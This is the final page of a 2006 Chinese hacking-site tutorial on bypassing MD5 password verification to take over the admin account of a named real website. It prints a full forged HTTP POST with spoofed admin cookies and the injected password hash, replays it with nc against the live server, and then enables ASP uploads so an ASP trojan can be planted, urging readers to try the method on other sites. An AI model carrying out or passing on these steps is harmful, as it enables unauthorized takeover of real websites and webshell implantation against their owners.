黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[组图]绕过md5验证继续入侵
      ★★★★★

绕过md5验证继续入侵

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-7-7 8:50:15

好了,现在在浏览器上输入


    这样的目的是抓到的包等一下可以直接提交给真实的服务器一样(可以在后台改,fullname是管理员的全名)。" target=http://lovefree.org/wenzhang/wenzhang地址,不需要修改包的大小,而为了保证大小一样,在我们机子上的username=admin,fullname=doudou,也设置的和远程服务器一样(可以在后台改,fullname是管理员的全名)。

    一切就绪,现在开始再抓一次修改密码的包,为了方便起见我已经把管理员信息改为username=admin,fullname=doudou了,剩下包里需要修改的信息,就是md5的密码值,因为md5加密后都是16位的,不影响包大小。

---------------------------------------------------------------------------------------

POST /admin/saveedit.asp?id=1 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint,


application/msword, application/x-shockwave-flash, */*

Referer: _blank>http://www.xijing.com.cn/admin/useredit.asp?id=1

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)

Host: www.xijing.com.cn

Content-Length: 110

Connection: Keep-Alive

Cache-Control: no-cache

(下面是coocike验证内容)

Cookie: NB796459377Vote1=1; ASPSESSIONIDQSTCRBQS=MGCLHDBBGDELLJGJGJHGKBML; reglevel=; fullname=doudou; KEY=super; UserName=admin; purview=99999; Passwd=24a2b13f36f9f99c

(下面是修改信息)

username=admin&passwd=abend&passwd2=abend&fullname=doudou&depid=10&oskey=super&shenhe=1&cmdok=+%D0%DE+%B8%C4+

---------------------------------------------------------------------------------------

    看到了,包和真的一样!简直就像从他的服务器上抓来的。这样我们要改的,就只有passwd的md5值了,就是说,只要这个也匹配,真正的lovefree.org服务器就会认可。改为24a2b13f36f9f99c就是注入得到的密码md5值。现在把host文件的内容改回来,改回来之后,再输入域名lovefree.org就是打开真实地址了。用nc提交(图6)


    哈哈!恭喜您!您的资料已经修改成功! 2秒钟后返回上页!

    现在密码就是abend。用它来登录后台,到网站属性改"上传文件类型:"多加一个asp,就可以上传asp木马

    就针对尘缘雅境来说,虽然大家可能没我那么幸运,刚好有个readnews1.asp文件没加过滤,但是如果不小心拿到了数据库,也不至于看着md5发愁了吧?其实还有很多程序都存在这样的问题,如果你拿到了某站管理员的md5值,不妨用这种方法试一下,也许有很大收获!

上一页  [1] [2] [3] 

文章录入:cainiaowang    责任编辑:sygbox 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886